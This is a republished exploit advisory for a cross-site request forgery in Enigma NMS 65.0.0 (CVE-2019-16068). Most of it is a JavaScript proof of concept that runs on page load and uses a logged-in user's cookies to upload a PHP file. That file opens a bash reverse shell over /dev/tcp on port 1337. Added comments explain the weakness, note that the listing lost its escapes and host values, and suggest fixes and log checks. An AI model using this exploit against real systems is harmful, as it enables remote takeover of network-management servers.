Published on September 9th, 2019 📆 | 6682 Views ⚑
Enigma NMS 65.0.0 – Cross-Site Request Forgery
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16068 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ _ / /
| D_ ] / -= Enigma CSRF by @xerubus =-
| D _]/ -= We all have something to hide =-
___/ / /
(_ )( _)
@Xerubus
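The following CSRF proof of concept abuses the user upload functionality within the NMS web application to create a PHP file that executes a reverse shell on port 1337. It only succeeds when it is loaded in the browser of a user who is already logged in to the NMS, because the forged request is sent with that user's session cookies (`xhr.withCredentials = true`).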
// Pushes a history entry whose URL is "/", so the address bar shows the site
// root instead of the path of the page that carries this script.
history.pushState('', '', '/')
/**
 * Sends one cross-site multipart/form-data POST to the NMS file-management
 * CGI using the visiting user's existing session (CVE-2019-16068 per the
 * advisory header).
 *
 * NOTE(review): this copy of the listing lost its string escape characters
 * and the target/listener host values during page extraction, so it does not
 * parse as shown. Read it as an illustration of the request shape and consult
 * the original advisory for the exact text.
 *
 * Why the request goes through: the form carries no anti-CSRF token field,
 * and the advisory's premise is that manage_files.cgi accepts it on the
 * session cookie alone. The uploaded part is named evil.php and typed
 * application/x-php, so the second weakness is that the upload feature takes
 * a server-side script.
 *
 * Defensive notes:
 *  - Require a per-session anti-CSRF token on every state-changing CGI and
 *    reject requests whose Origin/Referer is not the NMS itself.
 *  - Set SameSite=Lax or Strict on the session cookie so it is not attached
 *    to cross-site POSTs.
 *  - Restrict uploads to the expected file types and store them where the
 *    web server will not execute them.
 *  - Log review: POSTs to /cgi-bin/protected/manage_files.cgi with a foreign
 *    or missing Origin/Referer, or with an upfile filename ending in .php.
 */
function submitRequest()
{
var xhr = new XMLHttpRequest();
// Asynchronous POST to the file-management endpoint. The host part of the URL
// is empty in this copy of the listing.
xhr.open("POST", "http:///cgi-bin/protected/manage_files.cgi", true);
// Accept, Accept-Language and a multipart/form-data Content-Type are all
// CORS-safelisted, so the browser sends this cross-origin POST without a
// preflight. CORS only keeps the page from reading the response; it does not
// stop the server-side effect.
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------208051173310446317141640314495");
// Asks the browser to attach the user's cookies for the target origin, so the
// request rides on an already authenticated session.
xhr.withCredentials = true;
// Multipart body with four form fields: action, action_aux, upfile (the PHP
// file content) and upfile_name. None of them is a CSRF token.
var body = "-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="action"rn" +
"rn" +
"system_upgradern" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="action_aux"rn" +
"rn" +
"upload_file_completern" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="upfile"; filename="evil.php"rn" +
"Content-Type: application/x-phprn" +
"rn" +
"x3c?phpn" +
"n" +
"exec("/bin/bash -c 'bash -i x3e& /dev/tcp//1337 0x3e&1'");n" +
"n" +
"?x3en" +
"rn" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="upfile_name"rn" +
"rn" +
"evil.phprn" +
"-----------------------------208051173310446317141640314495--rn";
// Copies the string into a byte array, one char code per element (the typed
// array keeps only the low 8 bits of each code), and sends it as a Blob.
// Presumably this keeps the browser from re-encoding the body - confirm.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// The forged request is sent as soon as this script runs; no click or other
// interaction from the visiting user is involved.
submitRequest();
// The tab is then navigated to a regular NMS page (host part is empty in this
// copy of the listing); presumably so the user sees a familiar screen.
window.location='http:///cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
https://www.exploit-db.com/exploits/47363